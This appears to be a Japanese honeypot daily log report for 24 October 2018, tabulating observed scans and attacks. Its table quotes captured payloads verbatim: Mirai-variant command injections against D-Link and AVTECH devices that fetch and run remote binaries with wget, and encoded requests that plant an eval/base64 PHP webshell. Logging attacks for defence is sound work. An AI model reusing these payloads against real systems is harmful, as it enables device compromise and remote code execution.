ハニーポットのログ分析(2018/10/24)
WOWhoneypotの2018-10-24(運用 日目)の簡易分析です。
本日の総アクセス件数は 50件です。
特段目新しいものはありませんでした。
以下が全アクセスログです。
| 件数 | 日付 | 種別 | リクエスト |
| 30 | 2018-10-24 | アクセス | GET / |
| 3 | 2018-10-24 | 不正中継の調査 | CONNECT www.baidu.com:443 |
| 2 | 2018-10-24 | D-Linkを狙うMirai亜種の攻撃 | GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://128.199.251.119/t.php%27$ |
| 2 | 2018-10-24 | 不正中継の調査 | GET hxxp://www.baidu.com/ |
| 1 | 2018-10-24 | phpのWebShell設置の調査 | POST /images.php |
| 1 | 2018-10-24 | phpのWebShell設置の調査 | POST /cmx.php |
| 1 | 2018-10-24 | 調査 | OPTIONS / |
| 1 | 2018-10-24 | Jenkinsの調査 | GET /systemInfo |
| 1 | 2018-10-24 | クローリング | GET /robots.txt |
| 1 | 2018-10-24 | Tomcat管理ページへのブルートフォース攻撃 | GET /manager/html |
| 1 | 2018-10-24 | 不正中継の調査 | GET hxxp://www.ip.cn/ |
| 1 | 2018-10-24 | 不正中継の調査 | GET hxxp://www.123cha.com/ |
| 1 | 2018-10-24 | 不正中継の調査 | GET hxxp://api.ipify.org/ |
| 1 | 2018-10-24 | phpのWebShell設置の調査 | GET /cmx.php?cmd=echo+%5E%3C%3Fphp+%24func%3D%27c%27.%27r%27.%27e%27.%27a%27.%27t%27.%27e%27.%27_%27.%27f%27.%27u%27.%27n%27.%27c%27.%27t%27.%27i%27.%27o%27.%27n%27%3B%24test%3D%24func%28%27%24x%27%2C%27e%27.%27v%27.%27a%27.%27l%27.%27%28b%27.%27a%27.%27s%27.%27e%27.%276%27.%274%27.%27_%27.%27d%27.%27e%27.%27c%27.%27o%27.%27d%27.%27e%28%24x%29%29%3B%27%29%3B%24test%28%27QHNlc3Npb25fc3RhcnQoKTtpZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpeyhzdWJzdHIoc2hhMShtZDUoQCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicpJiYkX1NFU1NJT05bJ3RoZUNvZGUnXT10cmltKCRfUE9TVFsnY29kZSddKTt9aWYoaXNzZXQoJF9TRVNTSU9OWyd0aGVDb2RlJ10pKXtAZXZhbChiYXNlNjRfZGVjb2RlKCRfU0VTU0lPTlsndGhlQ29kZSddKSk7fQ%3D%3D%27%29%3B+%3F%5E%3E+%3Eimages.php+%26+echo+Hello%2C+Peppa%21 |
| 1 | 2018-10-24 | phpのWebShell設置の調査 | GET /cmx.php?cmd=echo+%22%3C%3Fphp+%5C%24func%3D%27c%27.%27r%27.%27e%27.%27a%27.%27t%27.%27e%27.%27_%27.%27f%27.%27u%27.%27n%27.%27c%27.%27t%27.%27i%27.%27o%27.%27n%27%3B%5C%24test%3D%5C%24func%28%27%5C%24x%27%2C%27e%27.%27v%27.%27a%27.%27l%27.%27%28b%27.%27a%27.%27s%27.%27e%27.%276%27.%274%27.%27_%27.%27d%27.%27e%27.%27c%27.%27o%27.%27d%27.%27e%28%5C%24x%29%29%3B%27%29%3B%5C%24test%28%27QHNlc3Npb25fc3RhcnQoKTtpZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpeyhzdWJzdHIoc2hhMShtZDUoQCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicpJiYkX1NFU1NJT05bJ3RoZUNvZGUnXT10cmltKCRfUE9TVFsnY29kZSddKTt9aWYoaXNzZXQoJF9TRVNTSU9OWyd0aGVDb2RlJ10pKXtAZXZhbChiYXNlNjRfZGVjb2RlKCRfU0VTU0lPTlsndGhlQ29kZSddKSk7fQ%3D%3D%27%29%3B+%3F%3E%22+%3Eimages.php+%26+echo+Hello%2C+Peppa%21 |
| 1 | 2018-10-24 | AVTECHの脆弱性を突くMirai亜種の攻撃 | GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20hxxp://104.244.76.210/avtech%20-O%20darkxo;%20chmod%20777%20darkxo;%20sh%20darkxo)&password=admin |
| 1 | 2018-10-24 | 不正中継の調査 | CONNECT cn.bing.com:443 |
本日のドメイン名でのアクセスは以下です。
3 GET /
1 GET /robots.txt
本日のハンティングログは以下です。
2 2018-10-24 wget hxxp://128.199.251[.]119/t.php
1 2018-10-24 wget hxxp://104.244.76[.]210/avtech
以上です。
